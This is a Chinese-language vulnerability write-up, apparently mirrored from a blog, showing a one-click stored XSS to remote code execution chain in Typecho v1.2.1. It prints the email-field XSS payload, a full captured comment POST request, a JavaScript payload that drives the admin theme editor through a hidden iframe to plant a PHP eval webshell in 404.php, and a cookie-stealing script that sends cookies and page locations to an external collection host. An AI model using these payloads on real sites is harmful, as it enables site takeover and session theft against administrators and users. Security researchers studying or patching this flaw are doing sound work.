3

Typecho v1.2.1 RCE

 1 year ago
source link: https://5ime.cn/typecho-xss2rce.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client
Typecho v1.2.1 RCE

Typecho v1.2.1 RCE

和前段时间的 PHPStudy RCE 一样是 1click,通过 存储型XSS 实现 RCE

今天关注到 Typecho Github仓库新增了一条 Issue :There’s still an XSS vulnerability in v1.2.1-rc

漏洞产生的原因是因为对Typecho 1.2.0 XSS漏洞修复不全导致,Issue 中提到的 Payload 如下(漏洞点在Email,而1.2.0漏洞点在网址)

"></a><script>alert('hacked')</script>"@example.com

直接抓包发送请求

POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
image-20230415200852968
"></a><script/src=http://url/1.js></script>"@example.com

js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545,主要是通过定义一个隐藏的 iframe 来操作 Typecho 内置的 编辑当前外观 功能来实现写入操作

function step1() {
  var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
  var oldata = document.body.innerHTML;
  document.body.innerHTML = oldata + data2;
}

var times=0;
var g_shell=0;
function poc() {
  if (times <= 10) {
    var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
    var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
    olddatas = htmldata.innerText;
    htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
    btn[1].click();
    times += 1;
    if (g_shell == 1) {
      var xhr1 = new XMLHttpRequest();
      xhr1.open("get", "/usr/themes/default/404.php?shell=1");
      xhr1.send();
    } else {
      return 0;
    }
  }
}

step1();

访问发现一句话木马已经被写入 404.php 文件

image-20230415203743033

获取 Cookie 脚本

var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK